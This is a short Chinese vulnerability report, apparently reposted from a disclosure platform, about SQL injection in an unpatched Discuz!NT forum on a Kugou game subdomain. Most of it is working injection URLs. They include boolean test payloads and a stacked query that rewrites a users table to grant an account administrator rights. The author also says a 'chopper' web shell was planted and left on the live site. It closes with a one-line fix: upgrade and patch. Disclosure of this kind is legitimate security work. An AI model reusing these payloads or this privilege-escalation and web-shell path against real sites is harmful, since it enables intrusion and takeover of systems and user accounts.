发现了论坛居然是dnt,还是旧的版本,最重要的是,没打补丁。。。 相关说明: http://nt.discuz.net/showtopic-135589.html http://xyj.kugou测试数据/bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1') or 1=1-- http://xyj.kugou测试数据/bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1') or 1=2-- 提升为管理员 http://xyj.kugou测试数据/bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1');update kg_users set groupid=1 where username='aaaaaaabc2010'-- 进入后台,拿shell http://xyj.kugou测试数据/bbs/tools/1.aspx chopper shell 还没删除,你们来删吧。。。也是到拿shell为止,什么也没做。 漏洞 证明: 修复方案: 升级打补丁 作者 Jannock
查看更多关于酷狗分站西游记官网SQL注射漏洞及修复 - 网站安的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12071